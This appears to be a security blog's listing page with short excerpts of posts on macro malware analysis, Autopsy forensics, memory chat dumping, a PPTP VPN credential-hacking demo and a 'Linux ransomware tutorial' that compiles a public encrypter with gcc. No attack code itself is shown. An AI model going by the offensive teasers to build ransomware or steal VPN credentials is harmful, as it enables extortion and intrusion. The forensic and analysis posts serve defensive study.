Analyze Macro Code from Malicious Documents

Microsoft office is something i guess everybody uses it and knows about it and you are a regular computer user then to somewhat extent you are definitely going to use Microsoft office or any other variant, so in this particular post we want to show you how malicious documents can be analyzed in order to find malicious macro code. so let's start it.

Malicious Samples

Macro Code is usually written in vba programming for more on it just see the wiki. here i have some malicious sample files which you can get by asking me in comments. they contain some macro code which basically just pings localhost and opens notepad.exe on a windows host.

malware asking for enable macro

cuckoo sandbox Automated Malware Analysis

cuckoo is a very famous automated malware analysis sandbox using which you can create your own poor guy's malware analysis lab. so let's see how we achieve the goal, stay with me.

Installation & First Run

As the Focus is not installation so i'll simply not let you suffer the huge article pain for installation, if you feel free to install you are pretty good to go with default installation url and if you feel like lost ping me and i'll help you in setting it as much as i can. okay so i assume you guys have already installed cuckoo and let's first run the cuckoo sandbox and virtual-box as well so that cuckoo can find our guest windows xp.

cuckoo.py

Digital Forensics Investigation with Autopsy

autopsy is a digital forensic investigation tool used by military personnels and corporate examiners to investigate which operations were currently performed on a target system, flash drive or specific files. so let's dig into it.

Get Autopsy

first of all we need to get Autopsy from this URL and then install it, upon successful installation you should be greeted with following screen.

autopsy first run

Dumping Plain text Chat From Memory - Forensic

We've already posted a way to capture ram using Dumpit now in this particular blog post we're going to show you how you can dump clear text chat messages from the memory so let's do it.

Capturing Data

Before Caputring Data We'll quickly use our browser to send some messages so let's do it and im using google hangout messenger.

Hangout messages

Hacking Any PPTP Vpn in 3 Minutes

pptp vpn basically stands for point-to-point tunneling protocol virtual private network which can be connected in order to be the part of a network. there are many benefits and profits if one is able to access the credentials of this vpn connection. so here is the demo how we'll do it.

Setup

we need an attacker and a victim machine to which we'll perform the attack, i am using windows 7 and backtrack for the purpose, below is the IPs of the machines and the vpn connection settings.

Windows IP

Linux Ransomware Tutorial - How to Do it

This post is strictly for educational purpose, we are not responsible for any action or reaction.

We Already know that world is being annoyed and blackmailed by ransomwares these days by the cyber criminals so here is a quick how to ransomware for those who don't know what it is and how it works .

Get You Arsenals

for the demo purpose we are going to use a public project that is available on github at this URL.

just get the encrypt.c & decrypt.c, then compile it using below command.

gcc -o enrypter encrypt.c -lssl -lcrypto

encrypt.c

Examine Malicious OLE Files - preventing zero day attacks

Microsoft developed OLE technology to combine documents to other objects which hackers also noticed so they tried to use the feature for their own benefit. they tried some micro word 2010 and rich text document also. Let's see how to see a Valid vs a Malicious DOC file.

Are You Ready ?

first create a valid test.doc file which i also created named as Test file.doc i.e micro word document. now its time to perform a quick mimefile analysis on the file, 

emldump.py -d filename